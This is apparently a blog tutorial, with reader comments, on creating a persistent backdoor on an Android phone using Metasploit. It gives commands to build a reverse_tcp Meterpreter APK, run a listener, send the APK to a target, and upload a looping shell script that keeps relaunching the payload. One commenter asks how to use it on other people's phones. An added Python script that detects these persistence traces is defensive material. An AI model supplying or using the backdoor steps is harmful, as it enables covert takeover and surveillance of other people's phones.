
How to make a persistent Android backdoor using Metasploit

Metasploit is one of the most powerful pentesting and exploitation tools out there, and in this tutorial I’ll show you how to use it to create an access backdoor on any Android phone and gain control over it.

DISCLAIMER: All the information in this article is intended for educational purposes only. I am not responsible for any misuse. 

Step 0: Fire up Metasploit

If you’re using Kali Linux/BackBox/BackTrack, Metasploit comes pre-installed with the system. Otherwise, you can download it from: https://www.metasploit.com

To start it, go to your terminal and type:

msfconsole

Wait for some time, and the Metasploit console will start.

Step 1: Create your payload

Open a new terminal and type:

msfpayload android/meterpreter/reverse_tcp LHOST=<your public ip address> R > /root/<name>.apk

This will create the actual exploit apk in your root folder.

Step 2: Set up the handler

Now go to the first terminal we opened. The msfconsole should still be open. Type:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST <your internal ip>

exploit

A listener should open. Now just keep this listener open and send the apk to your target device. Wait for them to install and voila! You have a backdoor. Now let’s make it persistent!



Step 3: The persistence script

Go to your root folder and create a new text file.

Write (Don’t copy!) the following lines in it:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

Save it as <name>.sh. The .sh extension is important.

Step 4: Upload it!

Go to your exploit meterpreter shell and type:

cd /

cd /sdcard/Download

Check if you are in the correct directory by typing:

ls

You should be in /storage/emulated/legacy/Download

Now upload the script:

upload <name>.sh

Step 5: Execute!

Type:

shell

Now, go to the place where you uploaded the script:

cd /

cd /sdcard/Download

Now, type:

sh <name>.sh

Now press Ctrl+C to exit the shell.

Step 6: Testing!

Close the msfconsole terminal. Open a new terminal and redo Step 2. This time, your terminal will instantly enter the meterpreter shell.

Done!

Note: The backdoor’s persistence is lost if the phone reboots.
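From the defender’s side, the persistence set up in Steps 3 to 5 leaves three recognisable traces on the device: a shell script in the Download directory that relaunches com.metasploit.stage/.MainActivity from an infinite loop, the stage package in the installed package list, and a shell process running that script. The following Python script is an added example (not code from the original post) that checks all three from evidence a responder can collect with adb; the sample script contents, package list and process list are constructed, and the file name persist.sh and the triage helper are assumptions.

```python
"""Detection of the relaunch-loop persistence on an Android device.

Added example, not code from the original post. It looks for the pattern the
post's script uses (an infinite shell loop that calls `am start` on
com.metasploit.stage/.MainActivity every few seconds) in three kinds of
evidence a responder can pull from a device: shell scripts found in the
Download directory, the output of `pm list packages`, and the output of `ps`.
Every sample input below is constructed for the demonstration.
"""
import re
from dataclasses import dataclass

# Package registered by the default Meterpreter APK, as named in the post's script.
METASPLOIT_STAGE = "com.metasploit.stage"

# `am start ... -n <package>/<activity>`; captures the component being launched.
AM_START_RE = re.compile(r"\bam\s+start\b.*?-n\s+(?P<pkg>[\w.]+)/(?P<act>[\w.]+)")
# Infinite shell loops: `while :`, `while true`, `for ((;;))`.
LOOP_RE = re.compile(r"^\s*(while\s*:|while\s+true|for\s*\(\(\s*;\s*;\s*\)\))", re.M)
SLEEP_RE = re.compile(r"^\s*sleep\s+\d+", re.M)
# A shell running a script out of the Download directory (where the post uploads it).
DOWNLOAD_SCRIPT_RE = re.compile(r"\bsh\s+\S*/Download/\S+\.sh\b")


@dataclass
class Finding:
    source: str   # which artefact the finding came from
    reason: str   # why it was flagged


def scan_script(name: str, text: str) -> list[Finding]:
    """Flag a shell script that relaunches an activity from an infinite loop."""
    findings: list[Finding] = []
    launches = AM_START_RE.findall(text)  # list of (package, activity) tuples
    if not launches:
        return findings  # no activity launch at all: not this pattern
    for pkg, act in launches:
        if pkg == METASPLOIT_STAGE:
            findings.append(Finding(name, f"launches Metasploit stage component {pkg}/{act}"))
    if LOOP_RE.search(text) and SLEEP_RE.search(text):
        findings.append(Finding(name, "infinite loop with sleep that relaunches an activity"))
    return findings


def scan_packages(pm_output: str) -> list[Finding]:
    """Flag the stage package in `pm list packages` output (lines look like `package:<name>`)."""
    findings: list[Finding] = []
    for line in pm_output.splitlines():
        line = line.strip()
        if line.startswith("package:") and line[len("package:"):] == METASPLOIT_STAGE:
            findings.append(Finding("pm list packages", f"{METASPLOIT_STAGE} is installed"))
    return findings


def scan_processes(ps_output: str) -> list[Finding]:
    """Flag the stage process and any shell executing a Download-directory script."""
    findings: list[Finding] = []
    for line in ps_output.splitlines():
        fields = line.split()
        if not fields:
            continue
        if fields[-1] == METASPLOIT_STAGE:
            findings.append(Finding("ps", f"{METASPLOIT_STAGE} process is running (pid {fields[1]})"))
        elif DOWNLOAD_SCRIPT_RE.search(line):
            findings.append(Finding("ps", f"shell running a Download-directory script: {line.strip()}"))
    return findings


def triage(scripts: dict[str, str], pm_output: str, ps_output: str) -> list[Finding]:
    """Combine all three checks; an empty list means none of the indicators were seen."""
    findings: list[Finding] = []
    for name, text in scripts.items():
        findings.extend(scan_script(name, text))
    findings.extend(scan_packages(pm_output))
    findings.extend(scan_processes(ps_output))
    return findings


# --- constructed sample evidence (file name persist.sh is an assumption) ---
PERSIST_SH = """#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
"""
HELPER_SH = """#!/bin/sh
# one-shot helper with no loop and no stage component: must not be flagged
am start -a android.intent.action.VIEW -d https://example.invalid
"""
PM_OUTPUT = "package:com.android.chrome\npackage:com.metasploit.stage\npackage:com.example.notes\n"
PS_OUTPUT = """USER     PID   PPID  VSIZE  RSS   WCHAN    PC         NAME
root     1     0     8624   648   ffffffff 00000000 S /init
u0_a12   1234  1     140260 27240 ffffffff 00000000 S com.metasploit.stage
u0_a12   1240  1234  5404   1200  ffffffff 00000000 S sh /sdcard/Download/persist.sh
"""

if __name__ == "__main__":
    for f in triage({"persist.sh": PERSIST_SH, "helper.sh": HELPER_SH}, PM_OUTPUT, PS_OUTPUT):
        print(f"[{f.source}] {f.reason}")
```

The script check deliberately fires on the loop-plus-sleep shape even when the launched component is not the Metasploit stage, because a repackaged payload will carry a different package name; the package and process checks are the cheap exact-match confirmations. Since the post’s own note says the loop does not survive a reboot, the process check is only useful on a device that has not been restarted, whereas the script and package checks still work afterwards.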

17 replies on “How to make a persistent Android backdoor using Metasploit”

Argh….. I just can’t get past step 1. Every time, it just shows this message:
bash: my_public_IP_address: No such file or directory
Of course, here, my_public_IP_address means what I really entered as my IP address.
Please help me out.

Haven’t tried this myself, but did you replace your public IP address with your IP? Let’s hope the author will answer you soon 🙂

Hi, very nice, it works!!!

Any idea for making it persistent after reboot?

When I reboot the phone I get a session because it start main activity,

But the shell doesn’t work anymore,

“Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.”

Anyone know where the main activity is located after a reboot?

Ty

Hey Pain_tester, Wait, it actually worked? What did you enter in your public IP address? The IP address of the phone? or the Computer? It just isn’t working for me. Can you help me out?

Error: Activity not started, unable to resolve Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x10000000 pkg=–user }

Guys it worked but it work on my phone but am have a problem with the upload it just come that script to my and it but how can I upload it to other peoples the shall is giving error

not working for me
I get this error:
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.
